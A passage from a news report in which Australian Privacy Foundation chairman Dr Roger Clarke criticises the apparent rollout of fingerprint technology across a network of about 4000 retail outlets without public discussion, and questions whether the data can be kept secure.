The chairman of the Australian Privacy Foundation, Dr. Roger Clarke, said: “I’m appalled by them appearing to get this technology off the ground without any public scrutiny.

“These types of initiatives are just too important to introduce without public discussion.”

Dr Clarke said securing fingerprints and other data across such a large retail network was a major concern.

“When we’re talking about 4000 outlets, many of which are privately owned, it’s difficult to design a system that will protect all information,” he said.